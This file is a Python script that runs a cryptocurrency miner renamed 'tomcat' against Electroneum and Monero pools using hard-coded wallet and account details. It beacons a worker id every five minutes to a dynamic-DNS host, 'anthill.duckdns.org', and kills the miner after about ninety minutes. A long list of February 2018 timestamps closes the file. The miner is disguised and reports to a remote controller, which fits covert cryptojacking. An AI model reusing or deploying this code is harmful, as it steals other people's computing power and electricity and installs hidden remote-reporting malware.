import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:06.355997
#2018-02-17 16:39:06.009745
#2018-02-17 18:27:05.065365
#2018-02-17 20:16:07.035461
#2018-02-17 22:03:01.708928
#2018-02-17 23:47:01.447333
#2018-02-18 01:38:02.205377
#2018-02-18 03:25:06.040384
#2018-02-18 05:13:03.437915
#2018-02-18 07:05:08.604687
#2018-02-18 08:53:05.026507
#2018-02-18 10:40:10.467470
#2018-02-18 12:25:07.899208
#2018-02-18 14:13:02.188413
#2018-02-18 16:02:06.983548
#2018-02-18 17:52:06.229641
#2018-02-18 19:39:07.243304
#2018-02-18 21:24:03.496618
#2018-02-18 23:13:01.748797
#2018-02-19 00:58:06.568791
#2018-02-19 02:46:01.294024
#2018-02-19 04:32:04.436059
#2018-02-19 06:17:03.837614
#2018-02-19 08:05:04.070968
#2018-02-19 09:55:08.734072
#2018-02-19 11:44:07.562416
#2018-02-19 13:31:08.183738
#2018-02-19 15:21:08.883715
#2018-02-19 17:09:01.990713
#2018-02-19 18:54:07.033542
#2018-02-19 20:33:06.685936
#2018-02-19 22:19:01.841060
#2018-02-20 00:04:07.415756
#2018-02-20 01:52:01.906951
#2018-02-20 03:40:06.378981
#2018-02-20 05:26:06.801391
#2018-02-20 07:11:02.024031
#2018-02-20 08:57:06.387410
#2018-02-20 10:41:08.533192
#2018-02-20 12:27:06.740216
#2018-02-20 14:14:04.701889
#2018-02-20 15:57:02.212923
#2018-02-20 17:44:09.058807
#2018-02-20 19:36:01.959988
#2018-02-20 21:22:05.729744
#2018-02-20 23:08:01.348488
#2018-02-21 00:53:01.860785
#2018-02-21 02:37:07.130139
#2018-02-21 04:25:04.074682
#2018-02-21 06:12:07.362921
#2018-02-21 07:57:17.481421
#2018-02-21 09:43:07.727989
#2018-02-21 11:32:05.409261
#2018-02-21 13:22:03.880260
#2018-02-21 15:09:09.256230
#2018-02-21 16:58:04.509106
#2018-02-21 18:46:06.237465
#2018-02-21 20:29:01.404210
#2018-02-21 22:17:06.990780
#2018-02-22 00:06:06.642233
#2018-02-22 01:53:01.395021
#2018-02-22 03:40:08.140096
#2018-02-22 06:27:03.747975
#2018-02-22 08:15:07.997149
#2018-02-22 10:03:05.667371
#2018-02-22 11:46:08.974688
#2018-02-22 13:31:07.648475
#2018-02-22 15:19:01.723091
#2018-02-22 17:04:10.277238
#2018-02-22 18:50:07.511796
#2018-02-22 20:42:05.784158
#2018-02-22 22:27:13.306159
#2018-02-23 00:14:04.073999
#2018-02-23 02:02:04.448992
#2018-02-23 03:50:08.321174
#2018-02-23 05:40:06.125028
#2018-02-23 07:25:07.881507
#2018-02-23 09:30:09.260106
#2018-02-23 11:36:04.988547
#2018-02-23 13:26:01.624377
#2018-02-23 15:11:10.322320
#2018-02-23 17:00:13.850550
#2018-02-23 18:49:02.244048
#2018-02-23 20:34:06.568440
#2018-02-23 22:20:10.499894
#2018-02-24 00:05:08.814924
#2018-02-24 01:54:05.215646
#2018-02-24 03:46:05.190436
#2018-02-24 05:36:08.393621
#2018-02-24 07:22:05.417870
#2018-02-24 09:13:05.083045
#2018-02-24 11:08:06.110706
#2018-02-24 12:56:03.738790
#2018-02-24 14:44:05.029732
#2018-02-24 16:34:07.034644
#2018-02-24 18:24:04.402235
#2018-02-24 20:10:06.153431
#2018-02-24 21:55:04.035182
#2018-02-25 00:55:06.733682
#2018-02-25 03:53:05.987900
#2018-02-25 07:25:06.072448